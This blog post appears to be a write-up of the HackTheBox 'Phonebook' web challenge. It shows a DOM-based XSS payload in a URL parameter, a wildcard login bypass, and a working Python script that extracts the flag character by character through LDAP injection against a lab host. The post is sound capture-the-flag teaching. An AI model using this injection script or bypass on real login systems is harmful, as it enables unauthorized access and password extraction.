Phonebook — HTB Web Challenge Writeup

Sakibul Ali Khan
3 min readApr 28, 2023

--

CHALLENGE DESCRIPTION

Who is lucky enough to be included in the phonebook?

Phonebook — HTB Web Challenge Writeup

In the beginning, we first visit the web page and got a login page :))

Phonebook — HTB Web Challenge Writeup

The Web app asks us to log in to the application. But we don’t have any credentials, but we have a text on the homepage where it says
New (9.8.2020): You can now login using the workstation username and password! - Reese

I take a dummy logging attempt as username: admin && password: admin. It shows the authentication field::(

Phonebook — HTB Web Challenge Writeup

But if you check the URL then you see there is a parameter :) And we can attempt an XSS attack through it. Is it possible? yes.

Phonebook — HTB Web Challenge Writeup

After viewing the source code of the webpage, I guess there might be a DOM-based XSS vulnerability. So, let’s try.

XSS Payload:

http://206.189.121.131:30184/login?message=<img src='x' onerror='alert(1)'>
Phonebook — HTB Web Challenge Writeup

Do you see? Here DOM-based XSS worked !!! But alas! this is not the way we can solve the challenge :((

In the login field, if you use “*” for both the username and password field then it automatically bypassed the authentication :)

Phonebook — HTB Web Challenge Writeup

This gives us a hint that it is probably using LDAP authentication.

Now we are going to try character brute-force (LDAP Injection) using Python script.

import requests
import string

headers = {"UserAgent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"}
url = "http://167.99.84.37:32125/login"

chars = string.ascii_letters
chars += ''.join(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!', '@', '$', '%', '&', '-', '_', "'"])

counter = 0
flag = "HTB{"

while True:
# if all chars are not correct means we previous already found the flag
if counter == len(chars):
print(flag + "}")
break

# creates something like HTB{a*}
password = flag + chars[counter] + "*}"
print("Trying: " + password)

data = {"username" : "Reese", "password" : password}
response = requests.post(url, headers=headers, data=data)

if (response.url != url + "?message=Authentication%20failed"):
# possible flag since we still using * at the end: e.g HTB{abc_*}.
# append chars[] so that we not need to deal with removing "*}" as compared to if we assign password variable to flag variable
flag += chars[counter]
counter = 0
else:
# increment the char since we might not have found the right letter
counter += 1

Once we iterated all the letters and the result still fails, it means that the latest password/flag entered without the asterisk (*) is the flag.

Phonebook — HTB Web Challenge Writeup

Hurrah!!! we got the flag that we are seeking :))

--

--

Sakibul Ali Khan
Sakibul Ali Khan

Written by Sakibul Ali Khan

Hi, I am Sakibul Ali Khan, a Red Teaming enthusiast from Bangladesh and a Cybersecurity Researcher at Yogosha.

No responses yet